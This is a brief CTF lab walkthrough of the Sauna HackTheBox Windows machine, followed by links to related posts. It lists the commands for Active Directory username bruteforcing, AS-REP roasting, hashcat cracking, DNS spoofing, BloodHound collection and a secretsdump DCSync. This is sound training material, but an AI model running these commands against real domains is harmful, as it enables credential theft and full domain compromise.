Sauna @ HackTheBox • Vulndev

30JulJuly 30, 2020

Sauna @ HackTheBox

By xct CTF asrep-roasting, dcsync, hackthebox, secretsdump, windows

Sauna is a 20-point Windows Machine on HackTheBox. For user, we bruteforce usernames and then use ASREP-Roasting to obtain the hash of one the users. For root, we find the logon password for an account that has DCSync privileges and then use secretsdump.py to execute the attack. My walkthrough is available on youtube:

Notes

Kerbrute:

kerbrute userenum -d egotistical-bank.local xato-net-10-million-usernames.txt --dc sauna.htb

ASREPRoast:

GetNPUsers.py egotistical-bank.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt -dc-ip sauna.htb

Hashcat:

hashcat -m 18200 asrep.txt rockyou.txt

Dnschef:

sudo sh -c 'python3 dnschef.py --fakeip 10.10.10.175 --fakedomains egotistical-bank.local -q'

Bloodhound:

bloodhound-python -c all -u svc_loanmgr -p 'password' -d egotistical-bank.local -dc egotistical-bank.local -ns 127.0.0.1

Secretsdump:

secretsdump.py 'egotistical-bank/svc_loanmgr:password@sauna.htb'

Author

xct

Related Posts

13AprApril 13, 2019

LaCasaDePapel @ HackTheBox

LaCasaDePapel is a rather easy machine on hackthebox.eu, featuring the use of php reflection, creating and signing of client certificates... read more

21NovNovember 21, 2020

Buff @ HackTheBox

Buff is a 20-point Windows Machine on HackTheBox, created by egotisticalSW. It involves 2 simple public exploits and forwarding a... read more

28MarMarch 28, 2020

Sniper @ HackTheBox

Sniper is a 30-point machine on HackTheBox that involves abusing a remote file inclusion and uploading a crafted chm file... read more

01FebFebruary 1, 2020

RE @ HackTheBox

RE is a 40 point windows machine on HackTheBox that involves uploading an ods file with a malicious macro, abusing... read more

28MarMarch 28, 2019

Helpline @ HackThebox

Helpline is a really fun box on hackthebox.eu, which I was lucky enough to get system first blood on :)... read more

28DecDecember 28, 2019

InfernoCTF Weakened Keys

"Weakened Keys" was an interesting crypto challenge on InfernoCTF. read more

09OctOctober 9, 2021

SSRF into Responder, gMSA Password & SeRestorePrivilege – Heist @ PG Practice

We are solving Heist from PG Practice. Heist is a really cool Windows machine that involves stealing a hash, reading... read more

22MayMay 22, 2021

Getting Access through the Helpdesk – Delivery @ HackTheBox

We are going to solve Delivery, a 20-point machine on HackTheBox. For user, we will bypass email verification on a... read more

28AprApril 28, 2019

Bastion @ HackTheBox

Bastion is an easy 20 points machine on hackthebox. It is about mounting a .vhd file over the network, retrieving... read more

27FebFebruary 27, 2021

Academy @ HackTheBox

Solving Academy on HackTheBox, a 20-point Linux machine on HackTheBox that involves a Laravel deserialization RCE, stored credentials & sudo... read more